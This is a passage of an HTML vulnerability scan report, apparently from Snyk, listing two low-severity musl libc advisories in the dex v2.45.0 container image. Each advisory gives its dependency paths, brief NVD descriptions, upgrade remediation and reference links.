<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-OPENSSL-15993269">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">Always-Incorrect Control Flow Implementation</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
musl/musl
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and musl/musl@1.2.5-r21
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl-utils@1.2.5-r21
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl-utils@1.2.5-r21
|
||
<span class="list-paths__item__arrow">›</span>
|
||
pax-utils/scanelf@1.3.8-r2
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
alpine-baselayout/alpine-baselayout@3.7.1-r8
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/busybox-binsh@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/busybox@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
zlib/zlib@1.3.1-r2
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl-utils@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>musl</code> package and not the <code>musl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical).</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>musl</code> to version 1.2.5-r23 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://musl.libc.org/releases.html">https://musl.libc.org/releases.html</a></li>
|
||
<li><a href="https://www.openwall.com/lists/oss-security/2026/04/10/13">https://www.openwall.com/lists/oss-security/2026/04/10/13</a></li>
|
||
<li><a href="http://www.openwall.com/lists/oss-security/2026/04/10/13">http://www.openwall.com/lists/oss-security/2026/04/10/13</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-MUSL-16008603">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">Improper Resource Shutdown or Release</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
musl/musl
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and musl/musl@1.2.5-r21
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl-utils@1.2.5-r21
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl-utils@1.2.5-r21
|
||
<span class="list-paths__item__arrow">›</span>
|
||
pax-utils/scanelf@1.3.8-r2
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
alpine-baselayout/alpine-baselayout@3.7.1-r8
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/busybox-binsh@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/busybox@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
zlib/zlib@1.3.1-r2
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
musl/musl-utils@1.2.5-r21
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>musl</code> package and not the <code>musl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>A security flaw has been discovered in musl libc up to 1.2.6. Affected is the function iconv of the file src/locale/iconv.c of the component GB18030 4-byte Decoder. Performing a manipulation results in inefficient algorithmic complexity. The attack must be initiated from a local position. To fix this issue, it is recommended to deploy a patch.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>musl</code> to version 1.2.5-r22 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://vuldb.com/submit/796352">https://vuldb.com/submit/796352</a></li>
|
||
<li><a href="https://vuldb.com/vuln/356620">https://vuldb.com/vuln/356620</a></li>
|
||
<li><a href="https://vuldb.com/vuln/356620/cti">https://vuldb.com/vuln/356620/cti</a></li>
|
||
<li><a href="https://www.openwall.com/lists/oss-security/2026/04/02/10">https://www.openwall.com/lists/oss-security/2026/04/02/10</a></li>
|
||
<li><a href="https://www.openwall.com/lists/oss-security/2026/04/03/2">https://www.openwall.com/lists/oss-security/2026/04/03/2</a></li>
|
||
<li><a href="http://www.openwall.com/lists/oss-security/2026/04/09/19">http://www.openwall.com/lists/oss-security/2026/04/09/19</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-MUSL-16032072">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
</div><!-- cards -->
|
||
</div>
|
||
</main><!-- .layout-stacked__content -->
|
||
</body>
|
||
|
||
</html>
|